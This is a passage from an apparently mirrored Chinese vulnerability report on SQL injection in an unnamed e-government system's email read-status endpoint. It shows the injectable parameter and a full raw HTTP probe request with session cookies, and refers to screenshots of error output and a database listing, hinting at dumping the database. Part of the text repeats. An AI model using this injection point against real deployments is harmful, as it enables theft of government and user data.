VULHUB ™

### 简要描述： 某电子政务系统sql注入第三弹 ### 详细说明： 注入点发现：加了个单引号 [<img src="https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg) 开始验证漏洞了：(本地最新下载版本) GET /email/sent/readstatus/type/trash?id=1' HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: bdshare_firstime=1377949252099; sYQDUGqqzHsearch_history=%u83AB%u540D%u5176%u5999%7C3%2C%u83AB%u540D%u5176%u5999%7C1%2C%u83AB%u540D%u5176%u5999%7C2%2C%u83AB%u540D%u5176%u5999%7C52%2C%u5218%u6C34%u7965%7C1%2C%u5218%u6C34%u7965%7C3;...

### 简要描述： 某电子政务系统sql注入第三弹 ### 详细说明： 注入点发现：加了个单引号 [<img src="https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg) 开始验证漏洞了：(本地最新下载版本) GET /email/sent/readstatus/type/trash?id=1' HTTP/1.1 Host: localhost Proxy-Connection: keep-alive Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: bdshare_firstime=1377949252099; sYQDUGqqzHsearch_history=%u83AB%u540D%u5176%u5999%7C3%2C%u83AB%u540D%u5176%u5999%7C1%2C%u83AB%u540D%u5176%u5999%7C2%2C%u83AB%u540D%u5176%u5999%7C52%2C%u5218%u6C34%u7965%7C1%2C%u5218%u6C34%u7965%7C3; VAAe_2132_ulastactivity=9ef8jg2bCnEtgD0qgMtFq8RoWHjgYuAcLA3yESzExcouOcnNu0Jm; VAAe_2132_lastcheckfeed=1%7C1390636626; WVk_lastvisit=337%091412074847%09%2Faudit%2Fphpwind_v9.0_utf8%2F; tour_current_step=0; tour_end=yes; file1_public_treeNode=2; file1_private_treeNode=1; viewType=grid; timelineView=summary; P_username=admin; GOASESSID=3b28fv0h1941m1r5gg55c4mbh5; language=zh_CN [<img src="https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg) 列出所有库： [<img src="https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg) 然后怎么脱裤就不用说了。。。。 ### 漏洞证明： 注入点发现：加了个单引号 [<img src="https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/02115109072f2a7e26f47d469fe16283b218b678.jpg) [<img src="https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/021151425fc8ffd466c668825a654c28dcce27a5.jpg) 列出所有库： [<img src="https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg" alt="Capture.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/0211522097630c630654296a054b388a1d610e51.jpg)